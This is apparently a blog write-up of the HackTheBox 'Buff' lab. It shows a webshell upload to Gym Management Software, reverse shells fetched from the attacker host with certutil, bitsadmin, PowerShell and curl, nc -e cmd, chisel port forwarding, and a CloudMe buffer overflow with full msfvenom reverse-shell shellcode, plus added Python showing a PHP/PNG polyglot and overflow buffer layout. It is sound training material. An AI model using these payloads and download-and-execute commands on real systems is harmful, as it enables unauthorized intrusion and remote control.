xsspresso
Web · Easy · Windows

HTB — Buff

Gym Management Software RCE via unauthenticated file upload. CloudMe buffer overflow with port forwarding for privilege escalation.

January 15, 2025 · HackTheBox
#File Upload #RCE #Buffer Overflow #Port Forwarding

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.198
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 08:47 EST
Nmap scan report for 10.10.10.198
Host is up (0.022s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
 
TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   20.00 ms 10.10.14.1
2   20.10 ms 10.10.10.198
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.79 seconds

8080/tcp open http

sh
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: mrb3n's Bro Hut

Gym Management Software 1.0

  • https://www.exploit-db.com/exploits/48506
  • the target URL must end with a trailing forward slash, otherwise the script errors out
  • the script uploads a PHP webshell prefixed with the PNG magic bytes so the upload passes the image check; that is why every command's output comes back with a stray PNG header in front of it
sh
python2 48506.py 'http://10.10.10.198:8080/'
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/
 
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun
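Added example, not code from the writeup or from the exploit-db script: why the upload step works and how to read the webshell's output. A PHP file prefixed with the 8-byte PNG signature passes a check that only inspects magic bytes, and every response from that file then starts with the same 8 bytes (the stray PNG in the whoami output above). A hardened check is shown beside the naive one. The filenames, the PHP one-liner and the sample responses are constructed.

```python
# Added example (not from the writeup or exploit-db 48506): PNG/PHP polyglot
# uploads, the naive check they defeat, a hardened check, and cleanup of the
# webshell's responses. Filenames, PHP source and sample bodies are constructed.

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def passes_magic_check(data: bytes) -> bool:
    """Naive server-side 'is this an image?' check: first 8 bytes only."""
    return data.startswith(PNG_SIGNATURE)


def make_polyglot(php_source: bytes) -> bytes:
    """PNG signature followed by PHP. PHP echoes the leading bytes as plain
    output and still executes the <?php ... ?> block that follows them."""
    return PNG_SIGNATURE + php_source


def strip_png_prefix(body: bytes) -> bytes:
    """Turn a response from the polyglot webshell into clean command output.
    Only a signature at offset 0 is removed; the bytes are left alone if they
    occur later inside genuine output."""
    if body.startswith(PNG_SIGNATURE):
        body = body[len(PNG_SIGNATURE):]
    return body.strip(b"\r\n")


# Hardened check for comparison: exactly one extension, taken from an
# allowlist, and the magic bytes must match THAT specific type.
ALLOWED_TYPES = {
    "png": PNG_SIGNATURE,
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def is_safe_upload(filename: str, data: bytes) -> bool:
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:      # rejects shell.php.png, .png, shell
        return False
    magic = ALLOWED_TYPES.get(parts[1])
    return magic is not None and data.startswith(magic)


# Constructed samples (not captured from the box).
WEBSHELL_PHP = b'<?php echo shell_exec($_GET["cmd"]); ?>'
POLYGLOT = make_polyglot(WEBSHELL_PHP)
SAMPLE_RESPONSE = PNG_SIGNATURE + b"\r\nbuff\\shaun\r\n"

if __name__ == "__main__":
    print("naive check, shell.php.png:", passes_magic_check(POLYGLOT))            # True
    print("hardened check, shell.php.png:", is_safe_upload("shell.php.png", POLYGLOT))  # False
    print("cleaned output:", strip_png_prefix(SAMPLE_RESPONSE).decode())
```

Note the limit of the hardened check: the same polyglot named shell.png still passes it, because the bytes really are a valid PNG prefix. The extension and magic checks only stop the double-extension trick; the upload directory must additionally be served without a PHP handler (or stored outside the web root under a server-generated name) for the RCE to go away.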

stable shell

sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe > rev.exe
  • any one of the following pulls a file from the attacker's web server onto the box when run from the webshell:
cmd
certutil.exe -f -urlcache -split http://10.10.14.6/rev.exe rev.exe
powershell
powershell.exe Invoke-WebRequest http://10.10.14.6/rev.exe -OutFile rev.exe
cmd
bitsadmin.exe /transfer n http://10.10.14.6/rev.exe C:\Users\shaun\rev.exe
cmd
certutil.exe -verifyctl -split -f http://10.10.14.6/rev.exe
  • bitsadmin needs an absolute local path; a bare filename fails
  • in the end nc.exe was fetched with curl (shipped with this Windows 10 build) and used for the reverse shell:
cmd
curl http://10.10.14.6/nc.exe -o C:\Users\Shaun\nc.exe
cmd
C:\xampp\htdocs\gym\upload> C:\Users\shaun\nc 10.10.14.6 443 -e cmd
sh
nc -lnvp 443 
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.198] 49923
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

user.txt

cmd
C:\Users\shaun\Desktop>type user.txt
type user.txt
0068038a...
 

priv esc

  • winPEAS is fetched the same way (certutil from cmd, or Invoke-WebRequest from PowerShell) and run from the user's home directory:
cmd
certutil.exe -f -urlcache -split http://10.10.14.6/winPEASx64.exe winPEASx64.exe
powershell
PS C:\Users\shaun> Invoke-WebRequest http://10.10.14.6/winPEASx64.exe -OutFile winPEASx64.exe
powershell
PS C:\Users\shaun> .\winPEASx64.exe
powershell
 
Current TCP Listening Ports
  Check for services restricted from the outside
  Enumerating IPv4 connections
 
  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name
             System
  TCP        10.10.10.198          8080          10.10.14.6            58748           Established       3228            C:\xampp\apache\bin\httpd.exe
  TCP        10.10.10.198          49923         10.10.14.6            443             Established       4684            C:\Users\shaun\nc.exe
  TCP        127.0.0.1             3306          0.0.0.0               0               Listening         8624            C:\xampp\mysql\bin\mysqld.exe
  TCP        127.0.0.1             8888          0.0.0.0               0               Listening         5280            CloudMe
powershell
Invoke-WebRequest http://10.10.14.6/winPEASany.exe -OutFile winPEASany.exe

CloudMe 1.11.2

  • https://www.exploit-db.com/exploits/48389
  • CloudMe listens on 127.0.0.1:8888 only (see the winPEAS output), so it cannot be hit from the attacking host directly; chisel is dropped on the box and a reverse forward brings 8888 (and MySQL's 3306) back to the attacker
powershell
PS C:\Users\shaun> Invoke-WebRequest http://10.10.14.6/chisel.exe -OutFile chisel.exe
sh
./chisel server --reverse --port 1234
powershell
PS C:\Users\shaun> ./chisel.exe client 10.10.14.6:1234 R:8888:127.0.0.1:8888 R:3306:127.0.0.1:3306
  • R:8888:127.0.0.1:8888 makes the chisel server listen on port 8888 on the attacking host and relay every connection to 127.0.0.1:8888 on the box, so the exploit can simply be pointed at 127.0.0.1:8888 locally
sh
nmap -sC -sV -p8888 127.0.0.1
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 16:55 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000031s latency).
 
PORT     STATE SERVICE    VERSION
8888/tcp open  tcpwrapped
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds
  • tcpwrapped only means the TCP handshake completed and the connection was closed after nmap's probe; it confirms the tunnel works, not the service or its version
  • generate 32-bit shellcode (CloudMe is a 32-bit process), excluding the bad characters \x00, \x0A and \x0D: msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1235 -b '\x00\x0A\x0D' -f python
  • paste the generated payload block into the exploit script in place of its shellcode; LPORT 1235 has to match the listener below
python
#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1235 -b '\x00\x0A\x0D' -f python
payload =  b""
payload += b"\xda\xd4\xd9\x74\x24\xf4\x58\xbd\xb4\xf0\xcd\x42"
payload += b"\x33\xc9\xb1\x52\x31\x68\x17\x83\xc0\x04\x03\xdc"
payload += b"\xe3\x2f\xb7\xe0\xec\x32\x38\x18\xed\x52\xb0\xfd"
payload += b"\xdc\x52\xa6\x76\x4e\x63\xac\xda\x63\x08\xe0\xce"
payload += b"\xf0\x7c\x2d\xe1\xb1\xcb\x0b\xcc\x42\x67\x6f\x4f"
payload += b"\xc1\x7a\xbc\xaf\xf8\xb4\xb1\xae\x3d\xa8\x38\xe2"
payload += b"\x96\xa6\xef\x12\x92\xf3\x33\x99\xe8\x12\x34\x7e"
payload += b"\xb8\x15\x15\xd1\xb2\x4f\xb5\xd0\x17\xe4\xfc\xca"
payload += b"\x74\xc1\xb7\x61\x4e\xbd\x49\xa3\x9e\x3e\xe5\x8a"
payload += b"\x2e\xcd\xf7\xcb\x89\x2e\x82\x25\xea\xd3\x95\xf2"
payload += b"\x90\x0f\x13\xe0\x33\xdb\x83\xcc\xc2\x08\x55\x87"
payload += b"\xc9\xe5\x11\xcf\xcd\xf8\xf6\x64\xe9\x71\xf9\xaa"
payload += b"\x7b\xc1\xde\x6e\x27\x91\x7f\x37\x8d\x74\x7f\x27"
payload += b"\x6e\x28\x25\x2c\x83\x3d\x54\x6f\xcc\xf2\x55\x8f"
payload += b"\x0c\x9d\xee\xfc\x3e\x02\x45\x6a\x73\xcb\x43\x6d"
payload += b"\x74\xe6\x34\xe1\x8b\x09\x45\x28\x48\x5d\x15\x42"
payload += b"\x79\xde\xfe\x92\x86\x0b\x50\xc2\x28\xe4\x11\xb2"
payload += b"\x88\x54\xfa\xd8\x06\x8a\x1a\xe3\xcc\xa3\xb1\x1e"
payload += b"\x87\xc1\x4f\x2e\x51\xbe\x4d\x2e\x59\xed\xdb\xc8"
payload += b"\x0b\x01\x8a\x43\xa4\xb8\x97\x1f\x55\x44\x02\x5a"
payload += b"\x55\xce\xa1\x9b\x18\x27\xcf\x8f\xcd\xc7\x9a\xed"
payload += b"\x58\xd7\x30\x99\x07\x4a\xdf\x59\x41\x77\x48\x0e"
payload += b"\x06\x49\x81\xda\xba\xf0\x3b\xf8\x46\x64\x03\xb8"
payload += b"\x9c\x55\x8a\x41\x50\xe1\xa8\x51\xac\xea\xf4\x05"
payload += b"\x60\xbd\xa2\xf3\xc6\x17\x05\xad\x90\xc4\xcf\x39"
payload += b"\x64\x27\xd0\x3f\x69\x62\xa6\xdf\xd8\xdb\xff\xe0"
payload += b"\xd5\x8b\xf7\x99\x0b\x2c\xf7\x70\x88\x5c\xb2\xd8"
payload += b"\xb9\xf4\x1b\x89\xfb\x98\x9b\x64\x3f\xa5\x1f\x8c"
payload += b"\xc0\x52\x3f\xe5\xc5\x1f\x87\x16\xb4\x30\x62\x18"
payload += b"\x6b\x30\xa7"
  • run the exploit
sh
python2 cloudme_bof.py
sh
nc -lvnp 1235
listening on [any] 1235 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.198] 49959
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
whoami
buff\administrator
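Added example, not the exploit-db 48389 script or the writeup's code: the layout of the buffer a stack-overflow exploit like the CloudMe one sends, plus the check a practitioner runs before pasting msfvenom output into it, namely that no byte from the -b set survived encoding and that the return address itself is clean. OFFSET_TO_EIP, RET_ADDR and the sample shellcode are placeholders; the real values come from the exploit script and from msfvenom.

```python
# Added example (not from exploit-db 48389 or the writeup): stack-overflow
# buffer layout and a bad-byte check for the shellcode pasted into it.
# OFFSET_TO_EIP, RET_ADDR and SAMPLE_SHELLCODE are hypothetical placeholders.
import struct

BAD_BYTES = b"\x00\x0a\x0d"      # the -b '\x00\x0A\x0D' set given to msfvenom above

OFFSET_TO_EIP = 1052             # hypothetical: bytes of junk before the saved EIP
RET_ADDR = 0x41414141            # hypothetical: address of a JMP ESP gadget
NOP_SLED = b"\x90" * 16          # landing pad in front of the shellcode


def find_bad_bytes(data: bytes, bad: bytes = BAD_BYTES) -> list:
    """(offset, byte) for every forbidden byte in data; empty list means clean."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_buffer(shellcode: bytes, offset: int = OFFSET_TO_EIP,
                 ret: int = RET_ADDR, sled: bytes = NOP_SLED) -> bytes:
    """junk | saved-EIP overwrite (little-endian) | NOP sled | shellcode.

    Refuses to build a buffer containing a bad byte. The return address is
    checked too: a gadget address with a NUL or CR/LF in it is a classic reason
    an otherwise correct exploit dies silently."""
    ret_bytes = struct.pack("<I", ret)
    for name, part in (("shellcode", shellcode), ("return address", ret_bytes)):
        hits = find_bad_bytes(part)
        if hits:
            raise ValueError(f"{name} contains bad bytes at {hits}")
    return b"A" * offset + ret_bytes + sled + shellcode


def eip_after_overflow(buffer: bytes, offset: int = OFFSET_TO_EIP) -> int:
    """The value the saved return address is overwritten with."""
    return struct.unpack("<I", buffer[offset:offset + 4])[0]


# Constructed stand-in for the msfvenom output (INT3 breakpoints), not a
# real reverse-shell payload.
SAMPLE_SHELLCODE = b"\xcc" * 32

if __name__ == "__main__":
    buf = build_buffer(SAMPLE_SHELLCODE)
    print("buffer length:", len(buf))
    print("EIP lands on:", hex(eip_after_overflow(buf)))
```

Run find_bad_bytes over the payload variable produced by msfvenom before pasting it; if it reports anything, the encoder was not given the right -b set. The same check on the packed return address catches the other common mistake, a gadget whose address contains a NUL byte.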

root.txt

cmd
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ac49c42a...